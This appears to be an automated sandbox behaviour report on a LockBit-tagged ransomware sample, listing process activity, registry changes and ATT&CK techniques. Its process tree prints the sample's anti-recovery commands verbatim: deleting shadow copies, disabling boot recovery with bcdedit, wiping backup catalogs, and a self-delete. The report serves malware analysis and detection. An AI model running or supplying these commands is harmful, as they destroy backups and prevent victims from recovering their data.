PID 1948 wrote to memory of 7548	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	113
PID 1948 wrote to memory of 7548	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	113
PID 1948 wrote to memory of 9936	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	115
PID 1948 wrote to memory of 9936	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	115
PID 1948 wrote to memory of 10152	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	117
PID 1948 wrote to memory of 10152	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	117
PID 1948 wrote to memory of 7740	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	119
PID 1948 wrote to memory of 7740	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	119
PID 1948 wrote to memory of 6276	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	121
PID 1948 wrote to memory of 6276	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	121
PID 1948 wrote to memory of 5460	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	123
PID 1948 wrote to memory of 5460	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	123
PID 1948 wrote to memory of 5956	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	125
PID 1948 wrote to memory of 5956	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	125
PID 1948 wrote to memory of 7732	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	127
PID 1948 wrote to memory of 7732	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	127
PID 1948 wrote to memory of 5684	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	129
PID 1948 wrote to memory of 5684	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	129
PID 1948 wrote to memory of 6452	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	131
PID 1948 wrote to memory of 6452	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	131
PID 1948 wrote to memory of 7512	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	133
PID 1948 wrote to memory of 7512	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	133
PID 1948 wrote to memory of 9416	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	135
PID 1948 wrote to memory of 9416	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	135
PID 1948 wrote to memory of 7940	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	137
PID 1948 wrote to memory of 7940	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	137
PID 1948 wrote to memory of 6916	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	146
PID 1948 wrote to memory of 6916	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	146
PID 1948 wrote to memory of 8004	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	141
PID 1948 wrote to memory of 8004	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	141
PID 1948 wrote to memory of 8796	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	143
PID 1948 wrote to memory of 8796	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	143
PID 1948 wrote to memory of 8376	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	145
PID 1948 wrote to memory of 8376	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	145
PID 1948 wrote to memory of 6000	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	147
PID 1948 wrote to memory of 6000	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	147
PID 1948 wrote to memory of 5356	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	149
PID 1948 wrote to memory of 5356	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	149

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
"C:\Users\Admin\AppData\Local\Temp\2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1948
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4972
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3236
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1008
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled no
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:5036
- - C:\Windows\system32\wbadmin.exe
    wbadmin delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:2448
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:4272
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5096
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2252
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:6664
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:6868
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:8440
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:6664
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:7548
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:9936
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:10152
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:7740
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  PID:6276
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:5460
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5956
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:7732
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:5684
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:6452
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  PID:7512
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:9416
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:7940
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:6916
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:8004
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:8796
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  PID:8376
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6916
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:6000
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5356
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8440
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:7784
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:9144
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:5476
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  PID:7300
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 20 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe"
  2⤵
  PID:7788
- - C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 20
    3⤵
    - Runs ping.exe
    PID:7144

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3204

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3264

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3644

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:5840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery